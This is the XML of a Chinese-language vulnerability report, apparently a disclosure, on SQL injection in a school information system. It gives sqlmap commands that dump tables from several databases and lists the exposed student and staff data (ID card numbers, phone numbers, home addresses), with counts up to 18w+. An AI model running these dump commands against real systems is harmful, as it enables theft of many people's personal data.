          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="31002D3D" wp14:editId="6ED443D1">
            <wp:extent cx="5480050" cy="3124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4A04" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取数据库，关键表如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74424481" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode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Style w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>fwgj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sjcj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sjfx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ywtb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>yygj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B0CE3" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333A3C67" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fwgj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2C1063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t_jcsj_xsjbxx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217D7F0F" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode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Style w:val="ExtensionTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>python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sqlmap.py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-u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StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"http://127.0.0.1:10292/"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--data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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>\"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sql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>\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>\"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}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--batch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--headers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StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>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-D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fwgj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-T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t_jcsj_xsjbxx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--start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1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--stop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3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--dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668014CD" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph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泄露信息包括：姓名，身份证，家庭住址等个人敏感信息（涉及信息数4w+）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAAD8B5" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine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603A8DC7" wp14:editId="415DF804">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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88898" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine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4D007A6F" wp14:editId="2665CB05">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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AD1E30" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440" w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606BF1A6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sys_user_ods_tmp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282261D2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泄露信息包括：姓名，身份证，手机号，职称等个人敏感信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数2k+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F7A13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2A2A385D" wp14:editId="30C10E72">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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CAFB00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7953E9E7" wp14:editId="23412F7E">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="3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C0F82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16C7AFE5" wp14:editId="05B3A3BC">
            <wp:extent cx="5334000" cy="3916045"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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164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BBC644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1FB208F4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  <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ywtb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E41D9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sys_user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1A00E712" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode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Style w:val="ExtensionTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>python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sqlmap.py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-u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StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"http://127.0.0.1:10292/"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--data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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>\"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sql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>\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>\"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}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--batch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--headers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StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"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-D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ywtb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-T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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sys_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">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--start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1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--stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>--dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD4AB9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泄露信息包括：姓名，身份证号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数18w+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261862FE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579D17F8" wp14:editId="40AD7988">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="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A5E34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5A1C3A96" wp14:editId="080060B7">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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1C9FA6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1E2563F8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  <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sjfx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78F192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t_sjfx_xsjbxx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09D824AA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泄露信息包括：姓名，身份证，手机号，学号，邮箱等个人敏感信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数1w+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44035131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118B0641" wp14:editId="1D7BA0D1">
            <wp:extent cx="5334000" cy="2541905"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795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20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EB0EC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2AD5240E" wp14:editId="4DD4F46B">
            <wp:extent cx="5334000" cy="2911475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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17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E62BB2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08271CF7" w14:textId="77777777" w:rsidR="006C5D1E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t_sjfx_jsjbxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8EE647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泄露信息包括：教师姓名、身份证号、手机号、个人邮箱、等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数2k+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082514A1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7DB183B6" wp14:editId="1E16CAF7">
            <wp:extent cx="5334000" cy="2414905"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="5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49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50802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6B75244B" wp14:editId="07FE44CA">
            <wp:extent cx="5334000" cy="3218815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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8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0EBF3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2A489E19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  <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>yygj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5F03C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t_ydmh_xs_sfzh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163E0EC2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泄露信息包括：姓名、身份证号、手机号、职工号（工号）等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数4w+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8DD99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40A1B075" wp14:editId="15FB3F64">
            <wp:extent cx="5334000" cy="2439035"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="6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96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EA2E77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62BB8C5C" wp14:editId="500485A1">
            <wp:extent cx="5334000" cy="3218815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="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8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57D0B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58875405" wp14:editId="5AAF182F">
            <wp:extent cx="5334000" cy="3218815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="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8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B0BD4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74218F04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t_ydmh_xs_sjh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467885D6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泄露信息包括：姓名、身份证号、手机号等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数4w+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B34679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0A3FB126" wp14:editId="487BABC3">
            <wp:extent cx="5334000" cy="3218815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="7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8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360BB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4B793114" wp14:editId="035CB2EC">
            <wp:extent cx="5334000" cy="3218815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="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188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C2B86F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772A2D46" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="44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t_jcsj_xsjbxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817C40D" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:ind w:leftChars="200" w:left="44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泄露信息包括：姓名、学号，家庭住址等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t>涉及信息数4w+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C8F6AC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1648B55E" wp14:editId="7E62A25F">
            <wp:extent cx="5334000" cy="3075305"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="7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758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BF70E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28FC24CD" wp14:editId="6C1CA3E9">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="8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31B45E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5FE163A5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t_xrs_lxfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B8A78D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泄露信息包括：姓名、手机号，工号等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>涉及信息数3k+</w:t>
      </w:r>
    </w:p>
